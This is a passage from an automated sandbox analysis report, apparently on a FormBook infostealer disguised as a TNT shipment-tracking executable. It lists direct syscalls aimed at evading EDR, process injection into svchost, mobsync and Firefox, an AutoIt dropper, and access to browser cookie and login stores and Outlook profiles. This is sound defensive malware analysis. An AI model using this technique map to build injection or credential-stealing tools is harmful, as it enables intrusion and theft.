Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03936A50 mov eax, dword ptr fs:[00000030h]	5_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940A5B mov eax, dword ptr fs:[00000030h]	5_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940A5B mov eax, dword ptr fs:[00000030h]	5_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039ACA72 mov eax, dword ptr fs:[00000030h]	5_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039ACA72 mov eax, dword ptr fs:[00000030h]	5_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396CA6F mov eax, dword ptr fs:[00000030h]	5_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396CA6F mov eax, dword ptr fs:[00000030h]	5_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396CA6F mov eax, dword ptr fs:[00000030h]	5_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DEA60 mov eax, dword ptr fs:[00000030h]	5_2_039DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B89B3 mov esi, dword ptr fs:[00000030h]	5_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B89B3 mov eax, dword ptr fs:[00000030h]	5_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B89B3 mov eax, dword ptr fs:[00000030h]	5_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0 mov eax, dword ptr fs:[00000030h]	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039309AD mov eax, dword ptr fs:[00000030h]	5_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039309AD mov eax, dword ptr fs:[00000030h]	5_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039649D0 mov eax, dword ptr fs:[00000030h]	5_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FA9D3 mov eax, dword ptr fs:[00000030h]	5_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C69C0 mov eax, dword ptr fs:[00000030h]	5_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039629F9 mov eax, dword ptr fs:[00000030h]	5_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039629F9 mov eax, dword ptr fs:[00000030h]	5_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BE9E0 mov eax, dword ptr fs:[00000030h]	5_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BC912 mov eax, dword ptr fs:[00000030h]	5_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928918 mov eax, dword ptr fs:[00000030h]	5_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03928918 mov eax, dword ptr fs:[00000030h]	5_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE908 mov eax, dword ptr fs:[00000030h]	5_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AE908 mov eax, dword ptr fs:[00000030h]	5_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B892A mov eax, dword ptr fs:[00000030h]	5_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C892B mov eax, dword ptr fs:[00000030h]	5_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B0946 mov eax, dword ptr fs:[00000030h]	5_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A04940 mov eax, dword ptr fs:[00000030h]	5_2_03A04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D4978 mov eax, dword ptr fs:[00000030h]	5_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D4978 mov eax, dword ptr fs:[00000030h]	5_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BC97C mov eax, dword ptr fs:[00000030h]	5_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03956962 mov eax, dword ptr fs:[00000030h]	5_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03956962 mov eax, dword ptr fs:[00000030h]	5_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03956962 mov eax, dword ptr fs:[00000030h]	5_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0397096E mov eax, dword ptr fs:[00000030h]	5_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0397096E mov edx, dword ptr fs:[00000030h]	5_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0397096E mov eax, dword ptr fs:[00000030h]	5_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BC89D mov eax, dword ptr fs:[00000030h]	5_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930887 mov eax, dword ptr fs:[00000030h]	5_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395E8C0 mov eax, dword ptr fs:[00000030h]	5_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A008C0 mov eax, dword ptr fs:[00000030h]	5_2_03A008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FA8E4 mov eax, dword ptr fs:[00000030h]	5_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BC810 mov eax, dword ptr fs:[00000030h]	5_2_039BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03952835 mov eax, dword ptr fs:[00000030h]	5_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03952835 mov eax, dword ptr fs:[00000030h]	5_2_03952835

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00AF80A9

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACA124 SetUnhandledExceptionFilter,	0_2_00ACA124
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ACA155
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024A124 SetUnhandledExceptionFilter,	4_2_0024A124
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0024A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread register set: target process: 3984

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EFB008			Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A68008			Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AF87B1 LogonUserW,

0_2_00AF87B1

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B3A

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00AA48D7

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B04C27 mouse_event,

0_2_00B04C27

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00AF7CAF

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00AF874B

Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RXSytTjWIT.exe, 0000000E.00000000.2713328576.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000002.3438681976.0000000000D51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe, RXSytTjWIT.exe, 0000000E.00000000.2713328576.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000002.3438681976.0000000000D51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RXSytTjWIT.exe, 0000000E.00000000.2713328576.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000002.3438681976.0000000000D51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RXSytTjWIT.exe, 0000000E.00000000.2713328576.0000000000D50000.00000002.00000001.00040000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000002.3438681976.0000000000D51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AC862B cpuid

0_2_00AC862B

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AD4E87

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AE1E06 GetUserNameW,

0_2_00AE1E06

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00AD3F3A

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA49A0

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: jailkeeper.exe	Binary or memory string: WIN_81
Source: jailkeeper.exe	Binary or memory string: WIN_XP
Source: jailkeeper.exe	Binary or memory string: WIN_XPe
Source: jailkeeper.exe	Binary or memory string: WIN_VISTA
Source: jailkeeper.exe	Binary or memory string: WIN_7
Source: jailkeeper.exe	Binary or memory string: WIN_8
Source: jailkeeper.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3439275115.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2801297101.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800761539.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439303985.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
